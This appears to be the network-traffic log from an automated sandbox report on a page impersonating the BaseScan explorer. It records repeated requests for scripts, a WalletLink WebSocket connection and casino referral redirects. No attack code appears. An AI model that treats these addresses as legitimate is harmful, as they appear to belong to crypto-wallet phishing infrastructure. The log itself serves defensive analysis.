            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.html HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/modules.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/config.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/z0emk-akw98-t47wk.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/loaderImage.gif HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /rpc HTTP/1.1Host: www.walletlink.orgConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: uSJkPnRENk38y8KxKpED6A==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/style.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/840013fd8c2ab234.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/config.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/modules.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/styles.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/loaderImage.gif HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/config.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/z0emk-akw98-t47wk.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/loaderImage.gif HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/config.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.html HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/modules.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/z0emk-akw98-t47wk.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/modules.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/style.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/840013fd8c2ab234.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/z0emk-akw98-t47wk.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/styles.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /rd/Q4JDBVEF2UBQFTMWKMDBF4T69 HTTP/1.1Host: goto.etherscan.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /up/asset/dc38ec7be7/2031a41ecc.png?w=728&h=90 HTTP/1.1Host: d107ul3j3wrui0.cloudfront.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /i-p3uc729n-n/?spin=true HTTP/1.1Host: bcgame.skConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /v1/requests HTTP/1.1Host: api.hypelab.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.html HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/modules.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/z0emk-akw98-t47wk.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /?spin=true&i=p3uc729n&utm_source=p3uc729n HTTP/1.1Host: bcgame.skConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-url=https%3A%2F%2Fbcgame.sk%2Fi-p3uc729n-n%2F%3Fspin%3Dtrue; invitation-alias-code=p3uc729n; invitation-view-id=1811400572970511703; utm_source=p3uc729n; 